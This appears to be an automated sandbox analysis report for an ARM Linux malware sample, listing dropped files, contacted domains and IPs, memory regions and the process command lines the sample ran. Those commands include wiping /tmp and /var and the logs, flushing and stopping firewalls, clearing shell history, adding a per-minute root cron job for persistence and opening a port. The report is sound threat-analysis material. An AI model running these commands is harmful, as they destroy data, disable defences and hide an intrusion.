Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
arm7.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
|
initial sample
|
||
/dev/ocmount
|
Bourne-Again shell script, ASCII text executable
|
dropped
|
||
/etc/cron.d/mount.sh
|
ASCII text
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/arm7.elf
|
/tmp/arm7.elf
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /tmp/arm7.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu
/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf
/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-rnzw4f /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf
/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg
/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Ylvv8i /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg
/tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics
/var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock
/var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup
/var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl
/var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d
/var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm
/var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd
/var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock
/var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g
/var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-WNhjUf
/var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g
/var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-NgTmVe
/var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmp
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "rm -rf /tmp/*"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /tmp/*
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "iptables -F"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -F
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "pkill -9 busybox"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 busybox
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "pkill -9 perl"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 perl
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "pkill -9 python"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 python
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "service iptables stop"
|
||
/bin/sh
|
-
|
||
/usr/sbin/service
|
service iptables stop
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
/usr/sbin/service
|
-
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
/usr/bin/systemctl
|
systemctl stop iptables.service
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
|
||
/bin/sh
|
-
|
||
/sbin/iptables
|
/sbin/iptables -F
|
||
/bin/sh
|
-
|
||
/sbin/iptables
|
/sbin/iptables -X
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "service firewall stop"
|
||
/bin/sh
|
-
|
||
/usr/sbin/service
|
service firewall stop
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
/usr/sbin/service
|
-
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
/usr/bin/systemctl
|
systemctl stop firewall.service
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "history -c"
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "rm -rf ~/.bash_history"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /root/.bash_history
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "history -w"
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "chmod +x /dev/ocmount"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /dev/ocmount
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c /dev/ocmount
|
||
/bin/sh
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/sda2
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/sda2
|
There are 122 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://Change_ip/octopus_re.sh;chmod
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
octopus1337.geek
|
156.238.224.214
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.125.190.26
|
unknown
|
United Kingdom
|
||
156.238.224.214
|
octopus1337.geek
|
Seychelles
|
||
212.118.43.167
|
unknown
|
Russian Federation
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fcc8003d000
|
page execute read
|
|||
7fcc8003d000
|
page execute read
|
|||
55aedaf9e000
|
page read and write
|
|||
7fcd856cc000
|
page read and write
|
|||
7fcc8004c000
|
page read and write
|
|||
7fcd85d4e000
|
page read and write
|
|||
55aedcf9c000
|
page execute and read and write
|
|||
7fcd80021000
|
page read and write
|
|||
55aedad44000
|
page execute read
|
|||
7fcd863a6000
|
page read and write
|
|||
7ffe6d4b5000
|
page read and write
|
|||
7fcd84ec4000
|
page read and write
|
|||
55aedaf95000
|
page read and write
|
|||
55aedcfb3000
|
page read and write
|
|||
7fcd8627d000
|
page read and write
|
|||
7fcd7ffff000
|
page read and write
|
|||
7fcd85eba000
|
page read and write
|
|||
7fcd84ec4000
|
page read and write
|
|||
55aedcf9c000
|
page execute and read and write
|
|||
7fcc8004e000
|
page read and write
|
|||
7fcd7ffff000
|
page read and write
|
|||
55aedcfb3000
|
page read and write
|
|||
7fcd8627d000
|
page read and write
|
|||
7ffe6d4b5000
|
page read and write
|
|||
7fcd80021000
|
page read and write
|
|||
7fcc80045000
|
page read and write
|
|||
7fcd863ca000
|
page read and write
|
|||
7fcd8609c000
|
page read and write
|
|||
7fcd85d2b000
|
page read and write
|
|||
7fcd856cc000
|
page read and write
|
|||
55aede96e000
|
page read and write
|
|||
7fcd8640f000
|
page read and write
|
|||
7fcd8640f000
|
page read and write
|
|||
7fcd85d2b000
|
page read and write
|
|||
7ffe6d5f4000
|
page execute read
|
|||
7fcc80045000
|
page read and write
|
|||
7ffe6d5f4000
|
page execute read
|
|||
55aede96e000
|
page read and write
|
|||
55aedaf95000
|
page read and write
|
|||
7fcd85d4e000
|
page read and write
|
|||
7fcd8609c000
|
page read and write
|
|||
7fcd863a6000
|
page read and write
|
|||
7fcd85eba000
|
page read and write
|
|||
7fcd8575e000
|
page read and write
|
|||
7fcd85ac0000
|
page read and write
|
|||
7fcd8575e000
|
page read and write
|
|||
55aedaf9e000
|
page read and write
|
|||
7fcd85ac0000
|
page read and write
|
|||
7fcd863ca000
|
page read and write
|
|||
7fcc8004c000
|
page read and write
|
|||
55aedad44000
|
page execute read
|
There are 41 hidden memdumps, click here to show them.